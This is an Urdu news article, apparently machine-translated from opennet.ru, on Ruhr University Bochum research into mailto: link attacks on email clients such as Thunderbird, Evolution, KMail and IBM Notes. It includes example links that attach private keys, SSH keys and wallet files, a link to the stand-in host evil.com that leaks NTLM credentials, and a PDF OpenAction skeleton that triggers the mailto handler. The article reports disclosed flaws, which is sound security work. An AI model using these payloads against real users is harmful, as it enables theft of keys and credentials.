"mailto:" لنکس کا استعمال کرتے ہوئے ای میل کلائنٹ کے صارفین پر حملہ کرنا

روہر یونیورسٹی بوخم (جرمنی) کے محققین تجزیہ کیا (PDF) میل کلائنٹس کا برتاؤ جب ایڈوانس پیرامیٹرز کے ساتھ "mailto:" لنکس پر کارروائی کرتے ہیں۔ جن بیس ای میل کلائنٹس کی جانچ کی گئی ان میں سے پانچ ایسے حملے کا شکار تھے جس نے "اٹیچ" پیرامیٹر کا استعمال کرتے ہوئے وسائل کے متبادل میں ہیرا پھیری کی۔ ایک اضافی چھ ای میل کلائنٹس PGP اور S/MIME کلیدی متبادل حملے کا شکار تھے، اور تین کلائنٹس کو خفیہ کردہ پیغامات کے مواد کو نکالنے کے لیے حملے کا خطرہ تھا۔

لنکس »: mailtoلنک میں بیان کردہ ایڈریس کو خط لکھنے کے لیے ای میل کلائنٹ کو خودکار طور پر کھولنے کے لیے استعمال کیا جاتا ہے۔ ایڈریس کے علاوہ، آپ لنک کے حصے کے طور پر اضافی پیرامیٹرز کی وضاحت کر سکتے ہیں، جیسے کہ خط کا موضوع اور عام مواد کے لیے ٹیمپلیٹ۔ مجوزہ حملہ "منسلک" پیرامیٹر میں ہیرا پھیری کرتا ہے، جو آپ کو پیدا کردہ پیغام کے ساتھ منسلکہ منسلک کرنے کی اجازت دیتا ہے۔

میل کلائنٹس Thunderbird، GNOME Evolution (CVE-2020-11879)، KDE KMail (CVE-2020-11880)، IBM/HCL نوٹس (CVE-2020-4089) اور Pegasus Mail ایک معمولی حملے کا شکار تھے جو آپ کو خود بخود منسلک کرنے کی اجازت دیتا ہے۔ کوئی بھی مقامی فائل، جس کی وضاحت کسی لنک کے ذریعے کی گئی ہے جیسے "mailto:?attach=path_to_file"۔ فائل کو انتباہ ظاہر کیے بغیر منسلک کیا گیا ہے، لہذا خصوصی توجہ کے بغیر، صارف کو یہ محسوس نہیں ہو سکتا کہ خط منسلکہ کے ساتھ بھیجا جائے گا۔

مثال کے طور پر، ایک لنک کا استعمال کرتے ہوئے جیسے "mailto:[ای میل محفوظ]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" آپ خط میں GnuPG سے نجی کلیدیں داخل کر سکتے ہیں۔ آپ کرپٹو والٹس (~/.bitcoin/wallet.dat)، SSH کیز (~/.ssh/id_rsa) اور صارف کے لیے قابل رسائی کسی بھی فائل کے مواد بھی بھیج سکتے ہیں۔ مزید یہ کہ، تھنڈر برڈ آپ کو "attach=/tmp/*.txt" جیسی تعمیرات کا استعمال کرتے ہوئے ماسک کے ذریعے فائلوں کے گروپس کو منسلک کرنے کی اجازت دیتا ہے۔

مقامی فائلوں کے علاوہ، کچھ ای میل کلائنٹس IMAP سرور میں نیٹ ورک اسٹوریج اور راستوں کے لنکس پر کارروائی کرتے ہیں۔ خاص طور پر، IBM Notes آپ کو "attach=\\evil.com\dummyfile" جیسے لنکس پر کارروائی کرتے وقت نیٹ ورک ڈائرکٹری سے فائل منتقل کرنے کی اجازت دیتا ہے، اور ساتھ ہی حملہ آور کے زیر کنٹرول SMB سرور کو لنک بھیج کر NTLM تصدیقی پیرامیٹرز کو روکتا ہے۔ (درخواست موجودہ تصدیقی پیرامیٹرز صارف کے ساتھ بھیجی جائے گی)۔

Thunderbird "attach=imap:///fetch>UID>/INBOX>1/" جیسی درخواستوں پر کامیابی کے ساتھ کارروائی کرتا ہے، جو آپ کو IMAP سرور پر فولڈرز سے مواد منسلک کرنے کی اجازت دیتا ہے۔ اسی وقت، IMAP سے بازیافت کیے گئے پیغامات، OpenPGP اور S/MIME کے ذریعے خفیہ کردہ، بھیجنے سے پہلے میل کلائنٹ کے ذریعے خود بخود ڈکرپٹ ہو جاتے ہیں۔ تھنڈر برڈ کے ڈویلپر تھے۔ مطلع کیا فروری میں مسئلہ کے بارے میں اور مسئلہ میں تھنڈر بیڈر 78 مسئلہ پہلے ہی طے ہوچکا ہے (تھنڈر برڈ کی شاخیں 52، 60 اور 68 کمزور ہیں)۔

تھنڈر برڈ کے پرانے ورژن بھی PGP اور S/MIME پر محققین کی طرف سے تجویز کردہ دو دیگر اٹیک ویریئنٹس کے لیے خطرناک تھے۔ خاص طور پر، تھنڈر برڈ، نیز آؤٹ لک، پوسٹ باکس، ای ایم کلائنٹ، میل میٹ اور R2Mail2، ایک اہم متبادل حملے کے تابع تھے، جس کی وجہ یہ ہے کہ میل کلائنٹ خود بخود S/MIME پیغامات میں منتقل ہونے والے نئے سرٹیفکیٹس کو درآمد اور انسٹال کرتا ہے، جس کی اجازت دیتا ہے۔ حملہ آور صارف کے ذریعہ پہلے سے ذخیرہ شدہ عوامی چابیاں کے متبادل کو منظم کرنے کے لئے۔

دوسرا حملہ، جس کے لیے تھنڈر برڈ، پوسٹ باکس اور میل میٹ حساس ہیں، ڈرافٹ پیغامات کو خودکار طریقے سے محفوظ کرنے کے طریقہ کار کی خصوصیات میں ہیرا پھیری کرتا ہے اور میلٹو پیرامیٹرز کا استعمال کرتے ہوئے، انکرپٹڈ پیغامات کی ڈکرپشن شروع کرنے یا صوابدیدی پیغامات کے لیے ڈیجیٹل دستخط کے اضافے کی اجازت دیتا ہے۔ نتیجہ کی بعد میں حملہ آور کے IMAP سرور پر منتقلی اس حملے میں، سائفر ٹیکسٹ کو "باڈی" پیرامیٹر کے ذریعے منتقل کیا جاتا ہے، اور "میٹا ریفریش" ٹیگ حملہ آور کے IMAP سرور پر کال شروع کرنے کے لیے استعمال ہوتا ہے۔ مثال کے طور پر: ' '

صارف کے تعامل کے بغیر "mailto:" لنکس کو خود بخود پروسیس کرنے کے لیے، خاص طور پر ڈیزائن کردہ PDF دستاویزات استعمال کی جا سکتی ہیں - PDF میں OpenAction ایکشن آپ کو دستاویز کھولتے وقت میلٹو ہینڈلر کو خود بخود لانچ کرنے کی اجازت دیتا ہے:

%PDF-1.5
1 اعتراض
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 اعتراض
<< /Type/Action/S /URI/URI (mailto:?body=——شروع PGP پیغام——[…])>>
endobj

"mailto:" لنکس کا استعمال کرتے ہوئے ای میل کلائنٹ کے صارفین پر حملہ کرنا

ماخذ: opennet.ru

نیا تبصرہ شامل کریں